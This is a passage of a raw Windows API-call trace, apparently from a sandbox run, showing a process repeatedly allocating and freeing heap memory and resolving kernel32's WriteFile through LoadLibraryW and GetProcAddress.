[0164.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0164.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0164.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0164.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0164.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0164.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0164.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0164.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0164.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0164.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0164.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0164.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0164.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0164.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0164.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0164.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0164.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0164.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0164.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0164.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0164.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0164.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0164.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0164.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0164.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0164.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0164.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0164.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0164.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0164.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0164.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0164.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0164.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0164.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0164.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0164.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0164.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0164.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0164.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0164.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0164.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0164.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0164.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0164.984] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0164.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0164.985] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0164.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0164.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0164.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0164.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a20 [0164.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0164.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0164.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0164.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0164.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b70 [0164.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0164.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0164.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0164.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0164.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0164.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0164.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0164.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0164.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0164.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0164.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0164.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0164.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0164.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0164.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0164.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0164.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0164.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0164.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0164.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0164.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0164.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ac0 [0164.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0164.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba570 [0164.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0164.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0164.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0164.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0164.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0164.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0164.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0164.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0164.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0164.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0164.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0164.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0164.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0164.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0164.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0164.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0164.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0164.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0164.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0164.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0164.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0164.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0164.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0164.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0164.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0164.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0164.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0164.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0164.987] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0164.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0164.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0164.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0164.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0164.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0164.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0164.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0164.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0164.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0164.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0164.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0164.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0164.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0164.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0164.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0164.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0164.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0164.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0164.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0164.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0164.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0164.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0164.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0164.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0164.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0164.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0164.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0164.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0164.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0164.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0164.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0164.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0164.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0164.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0164.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0164.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0164.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0164.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0164.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0164.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0164.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0164.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0164.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0164.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0164.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0164.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0164.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0164.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0164.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0164.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0164.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0164.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0164.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0164.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0164.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0164.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0164.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0164.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0164.990] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0164.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0164.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0164.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0164.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0164.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0164.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0164.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0164.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0164.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0164.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0164.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0164.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0164.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0164.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0164.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0164.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0164.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0164.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0164.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0164.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0164.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0164.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0164.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0164.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0164.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0164.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0164.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0164.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0164.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0164.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0164.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0164.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0164.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0164.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0164.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0164.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0164.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0164.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0164.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0164.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0164.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0164.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0164.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0164.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0164.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0164.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0164.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0164.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0164.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0164.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0164.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.992] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0164.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0164.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0164.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0164.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9ba390 [0164.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9ba390, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0164.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0164.993] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0164.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0164.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0164.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0164.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0164.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0164.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0164.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0164.993] HeapFree (in: hHeap=0x8a0000, 